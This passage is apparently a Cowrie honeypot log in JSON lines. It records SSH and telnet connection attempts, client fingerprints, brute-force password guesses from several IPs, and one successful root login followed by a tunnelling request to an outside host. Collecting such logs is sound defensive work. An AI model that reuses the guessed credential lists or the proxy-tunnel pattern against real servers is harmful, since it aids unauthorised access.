256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:18:45.009976Z","src_ip":"212.227.235.229","session":"71a20d4d3e64"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace","message":"login attempt [dspace/dspace] failed","sensor":"my-vps","timestamp":"2025-08-26T22:18:49.793857Z","src_ip":"212.227.235.229","session":"71a20d4d3e64"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:18:51.928370Z","src_ip":"212.227.235.229","session":"71a20d4d3e64"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:19:00.414526Z","src_ip":"106.12.128.104","session":"6fc5effdf960"}
{"eventid":"cowrie.session.closed","duration":42.622541427612305,"message":"Connection lost after 42 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:19:11.873174Z","src_ip":"212.227.235.229","session":"0434aecca026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63439,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d3b6e2d1f31","protocol":"ssh","message":"New connection: 212.227.125.160:63439 (1.2.3.4:22) [session: 8d3b6e2d1f31]","sensor":"my-vps","timestamp":"2025-08-26T22:20:17.963261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:20:17.964870Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:20:18.082811Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.login.failed","username":"user","password":"josh","message":"login attempt [user/josh] failed","sensor":"my-vps","timestamp":"2025-08-26T22:20:18.607511Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.login.failed","username":"user","password":"jimbob","message":"login attempt [user/jimbob] failed","sensor":"my-vps","timestamp":"2025-08-26T22:20:19.731071Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.login.failed","username":"user","password":"jimbo","message":"login attempt [user/jimbo] failed","sensor":"my-vps","timestamp":"2025-08-26T22:20:20.835167Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.login.failed","username":"user","password":"janine","message":"login attempt [user/janine] failed","sensor":"my-vps","timestamp":"2025-08-26T22:20:21.924430Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.login.failed","username":"user","password":"jackal","message":"login attempt [user/jackal] failed","sensor":"my-vps","timestamp":"2025-08-26T22:20:23.024384Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:20:24.143055Z","src_ip":"212.227.125.160","session":"8d3b6e2d1f31"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55550,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c32e7a1caf8","protocol":"ssh","message":"New connection: 217.72.205.35:55550 (1.2.3.4:22) [session: 4c32e7a1caf8]","sensor":"my-vps","timestamp":"2025-08-26T22:20:36.300965Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:20:36.302106Z","src_ip":"217.72.205.35","session":"4c32e7a1caf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48502,"dst_ip":"1.2.3.4","dst_port":22,"session":"d329de9016e9","protocol":"ssh","message":"New connection: 212.227.235.229:48502 (1.2.3.4:22) [session: d329de9016e9]","sensor":"my-vps","timestamp":"2025-08-26T22:21:10.983577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:21:11.815042Z","src_ip":"212.227.235.229","session":"d329de9016e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:21:11.815749Z","src_ip":"212.227.235.229","session":"d329de9016e9"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace1","message":"login attempt [dspace/dspace1] failed","sensor":"my-vps","timestamp":"2025-08-26T22:21:15.408842Z","src_ip":"212.227.235.229","session":"d329de9016e9"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:21:17.585505Z","src_ip":"212.227.235.229","session":"d329de9016e9"}
{"eventid":"cowrie.session.closed","duration":"301.7","message":"Connection lost after 301.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:21:48.023538Z","src_ip":"106.12.128.104","session":"0f399588b0a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32906,"dst_ip":"1.2.3.4","dst_port":23,"session":"00ded8817032","protocol":"telnet","message":"New connection: 212.227.125.160:32906 (1.2.3.4:23) [session: 00ded8817032]","sensor":"my-vps","timestamp":"2025-08-26T22:21:56.981613Z"}
{"eventid":"cowrie.session.closed","duration":12.895748376846313,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:22:09.877282Z","src_ip":"212.227.125.160","session":"00ded8817032"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11422,"dst_ip":"1.2.3.4","dst_port":22,"session":"879a3d953fb7","protocol":"ssh","message":"New connection: 212.227.125.160:11422 (1.2.3.4:22) [session: 879a3d953fb7]","sensor":"my-vps","timestamp":"2025-08-26T22:23:12.295722Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:23:12.296917Z","src_ip":"212.227.125.160","session":"879a3d953fb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11680,"dst_ip":"1.2.3.4","dst_port":22,"session":"065bfaa341e3","protocol":"ssh","message":"New connection: 212.227.125.160:11680 (1.2.3.4:22) [session: 065bfaa341e3]","sensor":"my-vps","timestamp":"2025-08-26T22:23:12.407280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:23:12.408285Z","src_ip":"212.227.125.160","session":"065bfaa341e3"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T22:23:12.520613Z","src_ip":"212.227.125.160","session":"065bfaa341e3"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:23:12.860063Z","src_ip":"212.227.125.160","session":"065bfaa341e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T22:23:12.973266Z","session":"065bfaa341e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35378,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e0e14ab494a","protocol":"ssh","message":"New connection: 212.227.235.229:35378 (1.2.3.4:22) [session: 4e0e14ab494a]","sensor":"my-vps","timestamp":"2025-08-26T22:23:30.046573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:23:31.440115Z","src_ip":"212.227.235.229","session":"4e0e14ab494a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:23:31.440900Z","src_ip":"212.227.235.229","session":"4e0e14ab494a"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace12","message":"login attempt [dspace/dspace12] failed","sensor":"my-vps","timestamp":"2025-08-26T22:23:36.172687Z","src_ip":"212.227.235.229","session":"4e0e14ab494a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:23:38.575790Z","src_ip":"212.227.235.229","session":"4e0e14ab494a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63214,"dst_ip":"1.2.3.4","dst_port":22,"session":"354be0cf9565","protocol":"ssh","message":"New connection: 212.227.235.229:63214 (1.2.3.4:22) [session: 354be0cf9565]","sensor":"my-vps","timestamp":"2025-08-26T22:23:57.756275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:23:57.757292Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:23:57.896727Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd","message":"login attempt [todd/todd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:23:58.610307Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd1","message":"login attempt [todd/todd1] failed","sensor":"my-vps","timestamp":"2025-08-26T22:23:59.779057Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd123","message":"login attempt [todd/todd123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:24:00.948080Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd1234","message":"login attempt [todd/todd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T22:24:02.492755Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd12345","message":"login attempt [todd/todd12345] failed","sensor":"my-vps","timestamp":"2025-08-26T22:24:03.656253Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:24:04.817488Z","src_ip":"212.227.235.229","session":"354be0cf9565"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.53","src_port":57946,"dst_ip":"1.2.3.4","dst_port":22,"session":"16aaaca69845","protocol":"ssh","message":"New connection: 205.210.31.53:57946 (1.2.3.4:22) [session: 16aaaca69845]","sensor":"my-vps","timestamp":"2025-08-26T22:24:11.036672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T22:24:11.830472Z","src_ip":"205.210.31.53","session":"16aaaca69845"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T22:24:12.937020Z","src_ip":"205.210.31.53","session":"16aaaca69845"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:24:19.541682Z","src_ip":"205.210.31.53","session":"16aaaca69845"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:24:22.406949Z","src_ip":"212.227.125.160","session":"065bfaa341e3"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":50510,"dst_ip":"1.2.3.4","dst_port":22,"session":"d542a3b85a32","protocol":"ssh","message":"New connection: 106.12.128.104:50510 (1.2.3.4:22) [session: d542a3b85a32]","sensor":"my-vps","timestamp":"2025-08-26T22:24:52.241087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:24:53.621378Z","src_ip":"106.12.128.104","session":"d542a3b85a32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:24:53.622092Z","src_ip":"106.12.128.104","session":"d542a3b85a32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50400,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4c5a5f167eb","protocol":"ssh","message":"New connection: 212.227.235.229:50400 (1.2.3.4:22) [session: e4c5a5f167eb]","sensor":"my-vps","timestamp":"2025-08-26T22:25:57.668082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:25:58.773370Z","src_ip":"212.227.235.229","session":"e4c5a5f167eb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:25:58.774332Z","src_ip":"212.227.235.229","session":"e4c5a5f167eb"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace123","message":"login attempt [dspace/dspace123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:26:03.260360Z","src_ip":"212.227.235.229","session":"e4c5a5f167eb"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:26:05.293602Z","src_ip":"212.227.235.229","session":"e4c5a5f167eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39194,"dst_ip":"1.2.3.4","dst_port":22,"session":"eadf97a3f8cc","protocol":"ssh","message":"New connection: 212.227.235.229:39194 (1.2.3.4:22) [session: eadf97a3f8cc]","sensor":"my-vps","timestamp":"2025-08-26T22:26:42.409233Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:26:42.417554Z","src_ip":"212.227.235.229","session":"eadf97a3f8cc"}
